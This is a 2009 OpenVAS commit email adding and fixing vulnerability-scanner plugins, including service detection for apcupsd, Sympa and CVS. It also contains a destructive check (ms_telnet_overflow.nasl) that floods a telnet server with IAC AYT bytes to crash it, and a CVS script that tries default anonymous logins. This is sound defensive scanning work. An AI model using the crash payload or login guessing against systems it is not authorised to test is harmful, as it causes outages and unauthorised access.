[Openvas-commits] r5376 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Mon Oct 5 19:43:10 CEST 2009


Author: mime
Date: 2009-10-05 19:43:01 +0200 (Mon, 05 Oct 2009)
New Revision: 5376

Added:
   trunk/openvas-plugins/scripts/apcnisd_detect.nasl
   trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl
   trunk/openvas-plugins/scripts/cvspserver_version.nasl
   trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl
   trunk/openvas-plugins/scripts/sympa_detect.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl
   trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl
   trunk/openvas-plugins/scripts/http_header_name_format_string.nasl
   trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl
   trunk/openvas-plugins/scripts/mssql_brute_force.nasl
   trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl
   trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl
   trunk/openvas-plugins/scripts/sybase_blank_password.nasl
   trunk/openvas-plugins/scripts/webmirror.nasl
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/ChangeLog	2009-10-05 17:43:01 UTC (rev 5376)
@@ -1,3 +1,32 @@
+2009-10-05  Michael Meyer <michael.meyer at intevation.de>
+
+	* scripts/cvspserver_version.nasl,
+	scripts/apcnisd_detect.nasl,
+	scripts/cvs_pserver_heap_overflow.nasl:
+	Added new plugins.
+
+	* scripts/secpod_ibm_db2_detect_win_900218.nasl,
+	scripts/monkeyweb_post_DoS.nasl,
+	scripts/http_header_name_format_string.nasl,
+	scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl:
+	Bugfixes.
+
+	* scripts/cvs_malformed_entry_lines_flaw.nasl,
+	scripts/cvs_file_existence_info_weak.nasl:
+	Added cvspserver_version.nasl as dependency.
+
+	* scripts/webmirror.nasl:
+	Removed debug stuff.
+
+	* scripts/sybase_blank_password.nasl,
+	scripts/mssql_brute_force.nasl:
+	Removed dependency "sybase_detect.nasl". Both scripts can do
+	their job without these dependency.
+
+	* scripts/sympa_detect.nasl,
+	scripts/ms_telnet_overflow.nasl:
+	Added plugins developed by LSS Security Team.
+
 2009-10-05  Chandrashekhar B <bchandra at secpod.com>
 
 	* scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl,

Added: trunk/openvas-plugins/scripts/apcnisd_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/apcnisd_detect.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/apcnisd_detect.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,78 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# apcupsd and apcnisd Detection Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100292);
+ script_version ("1.0-$Revision$");
+
+ desc = "Overview:
+   This host is running apcupsd or apcnisd . apcupsd and apcnisd
+   can be used for power mangement and controlling of APC's UPS
+   models.
+
+   See also:
+   http://www.apcupsd.com/
+
+   Risk factor : None";
+
+ script_name("apcupsd and apcnisd Detection Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of apcupsd or apcnisd");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/unknown", 3551, 7000);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("global_settings.inc");
+
+ports = make_list(7000, 3551);
+
+foreach port (ports) {
+
+  if(!get_port_state(port))continue;
+  soc = open_sock_tcp(port);
+  if(!soc)continue;
+  req  = raw_string(0x00, 0x06);
+  req += string("status");
+
+  send(socket:soc, data:req);
+  buf = recv(socket:soc, length:4096);
+  
+  if("APC" >< buf && "STATUS" >< buf) {
+   register_service(port:port, proto:"apcnisd"); 
+   if(report_verbosity > 0) { 
+      security_note(port:port);
+      exit(0);
+   }   
+ }  
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/apcnisd_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -43,8 +43,8 @@
  script_copyright("This script is Copyright (C) 2004 David Maciejak");
  family = "General";
  script_family(family);
- script_require_ports("Services/cvspserver", port);
- script_dependencies("find_service.nes", "cvs_pserver_heap_overflow.nasl");
+ script_require_ports("Services/cvspserver", 2401);
+ script_dependencies("find_service.nes", "cvspserver_version.nasl");
  exit(0);
 }
 

Modified: trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -51,8 +51,8 @@
  script_copyright("This script is Copyright (C) 2004 David Maciejak");
  family = "General";
  script_family(family);
- script_require_ports("Services/cvspserver", port);
- script_dependencies("find_service.nes", "cvs_pserver_heap_overflow.nasl");
+ script_require_ports("Services/cvspserver", 2401);
+ script_dependencies("find_service.nes", "cvspserver_version.nasl");
  exit(0);
 }
 

Added: trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,94 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100289);
+ script_bugtraq_id(10384);
+ script_cve_id("CVE-2004-0396");
+ script_version ("1.0-$Revision$");
+
+ script_name("CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability");
+
+desc = "Overview:
+CVS is prone to a remote heap overflow vulnerability. This issue
+presents itself during the handling of user-supplied input for entry
+lines with 'modified' and 'unchanged' flags. This vulnerability can
+allow an attacker to overflow a vulnerable buffer on the heap,
+possibly leading to arbitrary code execution.
+
+CVS versions 1.11.15 and prior and CVS feature versions 1.12.7 and
+prior are prone to this issue.
+
+**UPDATE: Symantec has confirmed that this vulnerability is being
+actively exploited in the wild. Administrators are urged to
+upgrade and block external access to potentially vulnerable
+servers, if possible.
+
+Solution:
+CVS versions 1.11.16 and 1.12.8 have been released to address
+this issue.
+
+References:
+http://www.securityfocus.com/bid/10384
+http://security.e-matters.de/advisories/072004.html?SID=384b888de96e3bce19306db8577fca26
+http://support.coresecurity.com/impact/exploits/62024ecea12fe1bbd01479065b3a1797.html
+http://ccvs.cvshome.org/
+http://marc.theaimsgroup.com/?l=openbsd-security-announce&m=108508894405639&w=2
+http://rhn.redhat.com/errata/RHSA-2004-190.html
+http://www.us-cert.gov/cas/techalerts/TA04-147A.html
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if CVS is prone to a remote heap overflow vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("General");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("cvspserver_version.nasl");
+ script_require_ports("Services/cvspserver", 2401);
+ exit(0);
+}
+
+include("version_func.inc");
+
+port = get_kb_item("Services/cvspserver");
+if(!port)port = 2401;
+
+if(!get_port_state(port))exit(0);
+
+if(!version = get_kb_item(string("cvs/", port, "/version")))exit(0);
+if(!isnull(version)) {
+
+  if(version_is_less(version: version, test_version: "1.11.15") ||
+     version_in_range(version: version, test_version: "1.12", test_version2: "1.12.7")) {
+      security_warning(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/cvspserver_version.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cvspserver_version.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/cvspserver_version.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# CVS pserver version Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100288);
+ script_version ("1.0-$Revision$");
+
+ script_name("CVS pserver version");
+
+ desc = "Overview : This script retrieves the version of CVS pserver
+  and saves the result in KB.
+
+  Risk factor : Informational";
+
+ script_description(desc);
+ script_summary("Set Version of CVS pserver in KB");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/cvspserver", 2401);
+ exit(0);
+}
+
+port = get_kb_item("Services/cvspserver");
+if(!port)port = 2401;
+if(!get_port_state(port))exit(0);
+
+logins      = make_list("anonymous", "anoncvs");
+passwords   = make_list("","anoncvs", "anon");
+dirs        = make_list("/var/lib/cvsd/","/cvs", "/cvsroot", "/home/ncvs", "/usr/local/cvs");
+
+foreach dir (dirs) {
+ foreach login (logins) {
+  foreach password (passwords) {
+
+    soc = open_sock_tcp(port);
+    if(!soc)exit(0);
+
+    req = string("BEGIN AUTH REQUEST\n", dir, "\n", login,"\n", "A", pass,"\n", "END AUTH REQUEST\n");
+    send(socket:soc, data:req);
+    buf = recv_line(socket:soc, length:4096);
+
+    if("I LOVE YOU" >< buf) {
+
+      set_kb_item(name:string("cvs/", port, "/login"), value:login);
+      set_kb_item(name:string("cvs/", port, "/pass"),  value:password);
+      set_kb_item(name:string("cvs/", port, "/dir"),   value:dir);
+
+      send(socket:soc, data:string("Root ", dir, "\nversion\n"));
+      buf = recv_line(socket:soc, length:4096);
+
+      if(egrep(string: buf, pattern: "CVS", icase:TRUE)) {
+
+	version = eregmatch(string:buf, pattern:"([0-9.]+)"); 
+
+	if(!isnull(version[1])) {
+            set_kb_item(name:string("cvs/", port, "/version"), value:version[1]);
+	    exit(0);
+	} else {
+            exit(0);;
+          } 	  
+      } else {
+          exit(0);
+        }
+    } else {
+       continue; 
+      }   
+  }
+ } 
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/cvspserver_version.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/http_header_name_format_string.nasl
===================================================================
--- trunk/openvas-plugins/scripts/http_header_name_format_string.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/http_header_name_format_string.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -51,8 +51,7 @@
 if (! get_port_state(port)) exit(0);
 if (http_is_dead(port: port)) exit(0);
 
-req = http_get(item: strcat("/openvas", rand_str(), ".html"),
-                      "Host: ", get_host_name(), port: port);
+req = http_get(item: strcat("/openvas", rand_str(), ".html"), port: port);
 
 soc = http_open_socket(port);
 if (! soc) exit(0);

Modified: trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl
===================================================================
--- trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -59,8 +59,7 @@
 
 soc = http_open_socket(port);
 if (! soc) exit(0);
-r = http_post(item: "/", "Host: ", get_host_name(),
-                             port: port, data: "");
+r = http_post(item: "/", port: port, data: "");
 r2 = ereg_replace(string: r,
 	pattern: 'Content-Length:([ 0-9]+)', replace: 'Content-Length:');
 if (r2 == r)	# Did not match?

Added: trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,90 @@
+###################################################################
+# OpenVAS Network Vulnerability Test
+# $ID$
+#
+# MS Telnet Overflow
+#
+# LSS-NVT-2009-008
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2009 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+if(description)
+{
+ script_id(102008);
+ script_version("1.0-$Revision$");
+ script_bugtraq_id(4061);
+ script_cve_id("CVE-2002-0020");
+
+ name = "MS Telnet Overflow";
+ script_name(name);
+
+ desc = "
+It is possible to crash remote telnet server via malformed protocol options.
+This flaw may allow attackers to execute arbitrary code on the system.
+
+Solution: http://www.microsoft.com/technet/security/bulletin/ms02-004.mspx
+
+Risk factor :High
+";
+
+ script_description(desc);
+
+ summary = "Attempts to overflow the Telnet server buffer";
+ script_summary(summary);
+
+ script_category(ACT_DESTRUCTIVE_ATTACK);
+
+ script_copyright("Copyright (C) 2009 LSS");
+ family = "Buffer overflow";
+ script_family(family);
+ script_require_ports("Services/telnet", 23);
+ exit(0);
+}
+
+##ATTACK##
+##Vulnerability tested on AYT commands##
+function telnet_attack(port){
+  iac_ayt = raw_string(0xff, 0xf6);
+  bomb_size = 100000;
+  sock = open_sock_tcp(port);
+  if(sock){
+    bomb = crap(data:iac_ayt, length:2*bomb_size);
+    send(socket:sock, data:bomb);
+    close(sock);
+    return(1);
+  }else{
+    log_message(data:'Can\'t connect to port ' + port);
+    return(0);
+  }
+}
+
+##MAIN##
+port = get_kb_item("Services/telnet");
+if(!port) port = 23;
+
+if(telnet_attack(port:port)){
+  sock = open_sock_tcp(port);
+  if(!sock){
+    security_hole(port);
+  }else{
+    close(sock);
+  }
+}else exit(-1);
+


Property changes on: trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/mssql_brute_force.nasl
===================================================================
--- trunk/openvas-plugins/scripts/mssql_brute_force.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/mssql_brute_force.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -48,7 +48,7 @@
  family = "Windows";
  script_family(family);
  script_require_ports("Services/mssql", 1433); 
- script_dependencie("mssqlserver_detect.nasl", "sybase_detect.nasl");
+ script_dependencie("mssqlserver_detect.nasl");
  exit(0);
 }
 
@@ -190,7 +190,7 @@
 
 report = "";
 port = get_kb_item("Services/mssql");
-if(!port) port = get_kb_item("Services/sybase");
+#if(!port) port = get_kb_item("Services/sybase");
 if(!port) port = 1433;
 
 

Modified: trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -51,6 +51,10 @@
 include("smb_nt.inc");
 include("secpod_smb_func.inc");
 
+if(!get_kb_item("SMB/WindowsVersion")){
+    exit(0);
+}
+
 key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";
 foreach item (registry_enum_keys(key:key))
 {

Modified: trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -79,6 +79,7 @@
 
 
 include("version_func.inc");
+include("http_func.inc");
 include("http_keepalive.inc");
 
 pcrPort = get_kb_item("Services/www");

Modified: trunk/openvas-plugins/scripts/sybase_blank_password.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sybase_blank_password.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/sybase_blank_password.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -45,7 +45,7 @@
  family = "Databases";
  script_family(family);
  script_require_ports("Services/sybase", 5000); 
- script_dependencies("sybase_detect.nasl");
+ script_dependencies("find_service.nes");
  exit(0);
 }
 
@@ -152,8 +152,9 @@
 }
 
 
-port = get_kb_item("Services/sybase");
-if(!port)port = 5000;
+#port = get_kb_item("Services/sybase");
+#if(!port)port = 5000;
+port = 5000;
 
 found = 0;
 

Added: trunk/openvas-plugins/scripts/sympa_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sympa_detect.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/sympa_detect.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,128 @@
+###################################################################
+# OpenVAS Network Vulnerability Test
+#
+# Sympa Detection
+#
+# LSS-NVT-2009-013
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2009 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+if(description)
+{
+ script_id(102013);
+ script_version("1.1-$Revision$");
+
+ script_name("Sympa Detection");
+
+ desc = "
+The remote host is running Sympa, an open source (GNU GPL) mailing list management (MLM) software
+suite written in Perl.
+
+See also : 
+
+http://www.sympa.org/
+
+Risk factor : None
+";
+
+ script_description(desc);
+
+ script_summary("Detects Sympa");
+
+ script_category(ACT_GATHER_INFO);
+
+ script_copyright("Copyright (C) 2009 LSS");
+ script_family("Service detection");
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ script_require_ports("Services/www", 80, 443);
+ 
+ exit(0);
+}
+
+include("global_settings.inc");
+include("http_func.inc");
+include("openvas-https.inc");
+
+
+# Function that checks each dir for Sympa installation
+# Optionally can use https
+
+function CheckSympa(use_https) {
+  dirs = make_list("/sympa", cgi_dirs());
+
+  # Go through dirs
+  foreach dir (dirs)
+  {
+    url = string(dir, "/");
+    req = http_get(item:url, port:port);
+    if(use_https==1)
+      req = https_req_get(request: req, port:port);
+    else
+      req = http_send_recv(data: req, port:port);
+      
+    if(isnull(req)) return;
+
+    # Check if it is Sympa
+    pat='Powered by ([^>]*>)?Sympa ?v?([0-9.]+)';
+    match=egrep(pattern:pat,string:req, icase:1);
+    
+    if(match || egrep(pattern:"<meta name=.generator. content=.Sympa",string:req,icase=1)) {
+      
+      # Instalation found, extract version
+      item=eregmatch(pattern:pat,string:match, icase:1);
+      ver=item[2];
+
+      # If version couldn't be extracted, mark as unknown
+      if(!ver) ver="unknown";
+
+      set_kb_item(name:string("www/", port, "/sympa"),value:string(ver, " under ", dir));
+      if(report_verbosity) {
+        if(dir=="") dir="/";
+        info+=" Version: " +ver + " under "+dir+'\n'+'\n';
+      }
+      n++;
+      if(!thorough_tests) break;
+    }
+  }
+}
+
+n=0;
+info="";
+
+# Check for installations on https
+port = get_kb_item("Services/www");
+if(!port) port = 443;
+if (get_port_state(port))
+  CheckSympa(use_https: 1);
+
+# Check for installations on http
+if(!n || thorough_tests) {
+  port = get_http_port(default:80);
+  if (get_port_state(port))
+    CheckSympa(use_https: 0);
+}
+
+if(!n) exit(0);
+
+if(report_verbosity) {
+  info="The following version(s) of Sympa were detected: "+'\n'+'\n'+info;
+  security_note(port:port, data:info);
+} else
+  security_note(port:port);
\ No newline at end of file


Property changes on: trunk/openvas-plugins/scripts/sympa_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/webmirror.nasl
===================================================================
--- trunk/openvas-plugins/scripts/webmirror.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/webmirror.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -1138,14 +1138,6 @@
   set_kb_item(name:string("www/", port, "/password_protected"), value:TRUE);
  }
 }
-foreach URL (URLs)
-{
- display(URL,"\n");
-}
-
-display("-----------------------------------------\n");
-
-
 report = "";
 
 foreach foo (keys(CGIs))



More information about the Openvas-commits mailing list